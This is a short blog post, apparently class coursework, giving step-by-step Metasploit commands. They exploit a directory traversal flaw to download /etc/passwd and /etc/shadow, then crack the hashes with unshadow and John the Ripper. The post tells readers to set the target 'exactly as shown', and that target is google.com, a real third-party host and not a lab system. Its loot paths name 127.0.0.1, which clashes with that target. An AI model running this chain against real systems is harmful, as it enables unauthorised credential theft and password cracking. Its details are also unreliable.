---
layout: post
title:  "Blog 4: Cracking Directory Passwords"
date:   2021-03-26 01:51:40 -0700
categories: Blog Class
---

The Metasploit auxiliary module that you can use requires a file list to know which files to download from the compromised system. We are using the URL encoding to replace "/" with "%2f":

    cat > files.txt
    etc%2fpasswd
    etc%2fshadow


Next, let's select the Generic HTTP Directory Traversal Utility module. It checks the targets for the directory traversal vulnerability, and depending on the selected option, can download specific files or check if it is possible to write files outside of the www directory. Select the module as follows:

	    msfconsole ---- to start the metasploit platform
      use auxiliary/scanner/http/http_traversal

The first two that you need to complete are: 

   `1) RHOSTS` for remote (target) host(s) and RPORT for the target port (which is set to 80 by default). 
   `2) TRIGGER` is for the path that triggers the vulnerability, 
   `3) ACTION` which in our case is DOWNLOAD
   `4) FILELIST` which specifies the list of files to download. 
   
   Set the options exactly as shown below: 
   
      set RHOSTS google.com

      set RPORT 8080

      set TRIGGER ..%2f..%2f..%2f..%2f..%2f..%2f..%2f

      set ACTION DOWNLOAD

      set FILELIST files.txt
      
Use `unshadow` as follows, specifying files downloaded by the Metasploit module. The format is unshadow PASSWDFILE SHADOWFILE, in that order, so make sure you are entering the correct file names. The yyyymmddhhmmss part is the timestamp, and xxxxxx and yyyyyy are numeric identifiers, which will be different for the* /etc/passwd* and /etc/shadow. We are saving the new file as passwords.

    sudo unshadow .msf4/loot/*yyyymmddhhmmss*_default_127.0.0.1_lfi.data_*xxxxxx*.txt  .msf4/loot/*yyyymmddhhmmss*_default_127.0.0.1_lfi.data_*yyyyyy*.txt > passwords

Let's view the new file and it should contain the uncracked passwords.

    cat passwords

Issue the following command to use John The Ripper with our passwords file to crack the passwords and done:

	sudo john passwords


